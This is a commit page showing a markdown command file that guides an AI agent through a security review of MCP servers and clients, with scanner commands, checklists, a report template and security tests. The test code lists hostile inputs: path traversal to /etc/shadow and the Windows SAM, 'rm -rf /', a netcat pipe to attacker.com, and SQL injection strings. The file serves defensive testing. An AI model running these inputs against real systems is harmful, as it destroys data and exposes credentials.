zhongwei/gh-phaezer-claude-mkt-plugins-mcp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Initial commit

Browse Source
This commit is contained in:
Zhongwei Li
2025-11-30 08:47:15 +08:00
commit 589fd01cad
18 changed files with 9823 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

578
commands/review-mcp-security.md Normal file
View File

@@ -0,0 +1,578 @@
---
description: Security review of MCP server or client
argument-hint: Path to MCP project for security review
---
# Security Review of MCP Implementation
Perform comprehensive security review of an MCP server or client implementation.
## Usage
```
/review-mcp-security [project-path]
```
**Arguments:**
- `project-path`: Path to MCP project directory (optional, defaults to current directory)
**Examples:**
```
/review-mcp-security
/review-mcp-security ./my-mcp-server
/review-mcp-security ../production-mcp-client
```
## What This Command Does
This command performs a thorough security review of an MCP implementation, checking for:
- Input validation vulnerabilities
- Path traversal issues
- Command/SQL injection risks
- API key exposure
- Information disclosure
- Dependency vulnerabilities
- Rate limiting issues
- Transport security
## Workflow Steps
### Step 1: Detect Project Details
Analyze the project to gather information:
1. **Type**: Server or Client?
2. **Language**: Python or TypeScript?
3. **External Integrations**: APIs, databases, filesystems?
4. **Authentication**: How are credentials managed?
5. **Transport**: stdio, SSE, or both?
### Step 2: Launch Security Reviewer Agent
Use the Task tool to launch `mcp-security-reviewer` agent.
**Agent Task:**
```
Perform comprehensive security review of MCP [server/client]:
Project: [project name]
Location: [project path]
Language: [Python/TypeScript]
Type: [Server/Client]
Review Areas:
1. Input Validation
- Tool parameter validation
- Resource URI parsing
- File path handling
- SQL query construction (if applicable)
- Command execution parameters
2. Authentication & Authorization
- API key management
- Token storage and handling
- Permission checking
- Rate limiting
3. Data Access Controls
- File system access restrictions
- Database query permissions
- API endpoint access
- Resource whitelisting
4. Information Disclosure
- Error messages
- Log output
- Stack traces
- Debug information
5. Dependency Security
- Known vulnerabilities
- Outdated packages
- Malicious packages
6. Transport Security (if SSE)
- HTTPS usage
- Certificate validation
- Man-in-the-middle protection
Deliverables:
- Complete security review report
- Vulnerability list with severity (Critical/High/Medium/Low)
- Specific code locations
- Remediation recommendations with code examples
- Security checklist results
```
### Step 3: Run Automated Security Scans
**Python Security Scanning:**
```bash
# Install security tools
pip install bandit safety pip-audit
# Bandit - code security scanner
bandit -r src/ -f json -o bandit-report.json
# Safety - dependency vulnerability checker
safety check --json > safety-report.json
# pip-audit - check for vulnerable dependencies
pip-audit --format json > pip-audit-report.json
```
**TypeScript Security Scanning:**
```bash
# npm audit - check for vulnerable dependencies
npm audit --json > npm-audit-report.json
# Snyk - comprehensive security scanning
npm install -g snyk
snyk auth
snyk test --json > snyk-report.json
# ESLint with security plugin
npm install -g eslint eslint-plugin-security
eslint --ext .ts src/ --format json > eslint-security-report.json
```
### Step 4: Manual Code Review
Review critical security-sensitive code areas:
**For Servers:**
1. **Tool Input Validation:**
```python
# Check each tool for proper validation
@mcp.tool()
def read_file(path: str) -> dict:
# LOOK FOR:
# - Path sanitization
# - Base directory restriction
# - Input length limits
# - Character whitelisting
```
2. **Command Execution:**
```python
# Check for shell=True usage (DANGEROUS)
subprocess.run(command, shell=True) # ❌ VULNERABLE
# Should use array and shell=False
subprocess.run([cmd, arg1, arg2], shell=False) # ✓ SAFE
```
3. **SQL Queries:**
```python
# Check for string concatenation (VULNERABLE)
query = f"SELECT * FROM users WHERE id = {user_id}" # ❌
# Should use parameterized queries
query = "SELECT * FROM users WHERE id = ?" # ✓
db.execute(query, (user_id,))
```
4. **API Key Management:**
```python
# Check for hardcoded secrets (VULNERABLE)
API_KEY = "sk-1234567890" # ❌
# Should use environment variables
API_KEY = os.getenv("API_KEY") # ✓
```
**For Clients:**
1. **Server Connection Validation:**
2. **Tool Parameter Sanitization:**
3. **Resource URI Validation:**
4. **Credential Storage:**
### Step 5: Check Security Best Practices
Verify implementation of security best practices:
**Input Validation Checklist:**
- [ ] All tool parameters validated
- [ ] Type checking enforced (Pydantic/Zod)
- [ ] Input length limits set
- [ ] Character whitelisting for sensitive inputs
- [ ] Regex patterns validated
**File System Security:**
- [ ] Base directory restrictions enforced
- [ ] Path traversal prevention implemented
- [ ] Symlink attack prevention
- [ ] File type validation
- [ ] Size limits enforced
**Command Execution Security:**
- [ ] shell=False always used
- [ ] Command whitelist implemented
- [ ] Argument sanitization
- [ ] Timeout limits set
**Database Security:**
- [ ] Parameterized queries only
- [ ] Read-only connections where possible
- [ ] Query timeout limits
- [ ] Connection pooling secure
**API Security:**
- [ ] Credentials in environment variables
- [ ] No secrets in logs
- [ ] HTTPS only for external APIs
- [ ] Certificate validation enabled
- [ ] Timeout limits set
**Error Handling:**
- [ ] No stack traces to users
- [ ] Generic error messages
- [ ] Detailed errors logged securely
- [ ] Error correlation IDs
**Rate Limiting:**
- [ ] Per-tool rate limits
- [ ] Per-user rate limits (if applicable)
- [ ] Global rate limits
- [ ] Backoff strategies
**Logging:**
- [ ] No credentials logged
- [ ] Sensitive data redacted
- [ ] Security events logged
- [ ] Log rotation configured
### Step 6: Dependency Vulnerability Assessment
Analyze all dependencies for known vulnerabilities:
**Python:**
```bash
# Check all dependencies
safety check --full-report
# Check specific package
pip show package-name
```
**TypeScript:**
```bash
# Check all dependencies
npm audit
# Fix automatically where possible
npm audit fix
# Check for major updates
npm outdated
```
**Create Dependency Report:**
| Package | Current | Vulnerability | Severity | Fixed In | Action |
|---------|---------|---------------|----------|----------|--------|
| requests | 2.25.0 | CVE-2023-xxxxx | High | 2.31.0 | Update |
| axios | 0.21.1 | CVE-2021-3749 | Critical | 0.21.2 | Update |
### Step 7: Test Security Scenarios
Run security-specific tests:
```python
import pytest
class TestSecurityScenarios:
"""Security-focused test cases"""
def test_path_traversal_prevention(self):
"""Attempt path traversal attacks"""
malicious_paths = [
"../../../etc/passwd",
"..\\..\\..\\windows\\system32\\config\\sam",
"/etc/shadow",
"C:\\Windows\\System32\\config\\SAM"
]
for path in malicious_paths:
result = mcp.call_tool("read_file", {"path": path})
assert result["success"] is False
assert "access denied" in result["error"].lower()
def test_command_injection_prevention(self):
"""Attempt command injection"""
malicious_commands = [
"ls; rm -rf /",
"ls && cat /etc/passwd",
"ls | nc attacker.com 4444"
]
for cmd in malicious_commands:
result = mcp.call_tool("run", {"command": cmd})
assert result["success"] is False
def test_sql_injection_prevention(self):
"""Attempt SQL injection"""
malicious_inputs = [
"admin' OR '1'='1",
"'; DROP TABLE users; --",
"admin' UNION SELECT password FROM users--"
]
for username in malicious_inputs:
result = mcp.call_tool("search_user", {"username": username})
# Should not return unauthorized data
assert result.get("users", []) == []
def test_no_secrets_in_errors(self):
"""Ensure secrets not exposed in errors"""
result = mcp.call_tool("api_call_with_token", {"endpoint": "/invalid"})
# Check error doesn't contain API key
error_str = str(result).lower()
assert "api_key" not in error_str
assert "token" not in error_str
assert "secret" not in error_str
def test_rate_limiting(self):
"""Verify rate limiting works"""
# Make many requests rapidly
results = []
for i in range(150):
result = mcp.call_tool("expensive_operation", {})
results.append(result)
# Some requests should be rate limited
rate_limited = [r for r in results if "rate limit" in r.get("error", "").lower()]
assert len(rate_limited) > 0
```
### Step 8: Generate Security Report
Create comprehensive security report:
```markdown
# Security Review Report
**Project**: [project name]
**Version**: [version]
**Review Date**: [date]
**Reviewer**: Security Review Agent
## Executive Summary
[Brief overview of security posture]
**Overall Risk Level**: [Low/Medium/High/Critical]
**Summary**:
- Critical Issues: [count]
- High Severity: [count]
- Medium Severity: [count]
- Low Severity: [count]
- Informational: [count]
## Critical Vulnerabilities (Fix Immediately)
### 1. Path Traversal in read_file Tool
**Severity**: Critical
**CWE**: CWE-22 (Path Traversal)
**Location**: `src/tools/filesystem.py:45`
**Description**:
The `read_file` tool does not validate file paths, allowing attackers to read arbitrary files on the system.
**Vulnerable Code**:
```python
@mcp.tool()
def read_file(path: str) -> dict:
with open(path, 'r') as f:
return {"content": f.read()}
```
**Proof of Concept**:
```
read_file(path="../../../etc/passwd")
```
**Impact**:
Attackers can read sensitive files including:
- /etc/passwd, /etc/shadow
- SSH keys
- Application secrets
- Database credentials
**Remediation**:
```python
from pathlib import Path
BASE_DIR = Path("/safe/data/directory").resolve()
@mcp.tool()
def read_file(path: str) -> dict:
try:
# Resolve and validate path
file_path = (BASE_DIR / path).resolve()
file_path.relative_to(BASE_DIR) # Raises ValueError if outside BASE_DIR
with open(file_path, 'r') as f:
return {"success": True, "content": f.read()}
except ValueError:
return {"success": False, "error": "Access denied"}
except Exception as e:
return {"success": False, "error": "Read failed"}
```
[Continue for all critical issues...]
## High Severity Issues
[List all high severity issues with similar format]
## Medium Severity Issues
[List all medium severity issues]
## Low Severity Issues
[List all low severity issues]
## Dependency Vulnerabilities
| Package | Version | Vulnerability | Severity | Fixed Version |
|---------|---------|---------------|----------|---------------|
| [package] | [current] | [CVE-ID] | [severity] | [fixed] |
## Security Checklist
### Input Validation
- [ ] Tool parameters validated ❌
- [ ] Type checking enforced ✓
- [ ] Length limits set ✓
- [ ] Character whitelisting ❌
### Authentication & Authorization
- [ ] API keys in environment ❌ (hardcoded in config.py)
- [ ] No secrets in code ❌
- [ ] Rate limiting implemented ✓
- [ ] Token validation ✓
### Data Access
- [ ] File system restricted ❌ (CRITICAL)
- [ ] SQL injection prevented ✓
- [ ] Command injection prevented ❌ (HIGH)
### Error Handling
- [ ] No stack traces exposed ✓
- [ ] Generic error messages ✓
- [ ] Secrets not in logs ⚠️ (needs verification)
## Recommendations
### Immediate Actions (Within 1 Week)
1. **Fix path traversal** in read_file tool
2. **Remove hardcoded API keys** - move to environment variables
3. **Fix command injection** in run_command tool
4. **Update vulnerable dependencies**:
- requests: 2.25.0 → 2.31.0
- axios: 0.21.1 → 1.6.0
### Short Term (Within 1 Month)
1. Implement comprehensive input validation for all tools
2. Add rate limiting to all expensive operations
3. Implement security logging for audit trail
4. Add automated security scanning to CI/CD
### Long Term
1. Regular security audits (quarterly)
2. Automated dependency updates
3. Security training for development team
4. Penetration testing
## Testing Recommendations
Add these security tests:
```python
# tests/security/test_security.py
def test_path_traversal():
"""Verify path traversal prevention"""
def test_command_injection():
"""Verify command injection prevention"""
def test_no_hardcoded_secrets():
"""Scan codebase for hardcoded secrets"""
```
## Compliance
- [ ] OWASP Top 10 addressed
- [ ] CWE Top 25 reviewed
- [ ] Secure coding practices followed
- [ ] Security documentation present
## Conclusion
[Overall assessment and required actions]
**Next Review**: [recommended date]
```
### Step 9: Provide Remediation Guidance
For each vulnerability, provide:
1. **Detailed explanation** of the issue
2. **Severity rating** with justification
3. **Working code example** showing the fix
4. **Testing recommendations**
5. **Additional resources**
### Step 10: Generate Summary
```
✓ Security Review Complete: [project-name]
Security Assessment:
Overall Risk: HIGH ⚠️
Critical Issues: 2
High Severity: 3
Medium Severity: 5
Low Severity: 8
Top Issues to Fix:
1. [CRITICAL] Path traversal in read_file tool
2. [CRITICAL] Hardcoded API keys in config.py
3. [HIGH] Command injection in run_command
4. [HIGH] SQL injection in search_users
5. [HIGH] Information disclosure in error messages
Dependency Issues:
- 3 packages with known vulnerabilities
- 2 packages severely outdated
Recommendations:
⚠️ Fix critical issues immediately before deployment
⚠️ Update all vulnerable dependencies
✓ Add security tests to test suite
✓ Implement automated security scanning in CI/CD
Detailed report: ./security-report.md
Scan results: ./security-scans/
```
## Success Criteria
- [ ] Security review agent completed analysis
- [ ] Automated security scans run
- [ ] Manual code review performed
- [ ] Security test cases created
- [ ] Vulnerabilities documented with severity
- [ ] Remediation guidance provided
- [ ] Security report generated
- [ ] Dependencies checked for vulnerabilities
This command ensures MCP implementations follow security best practices and are safe for production use.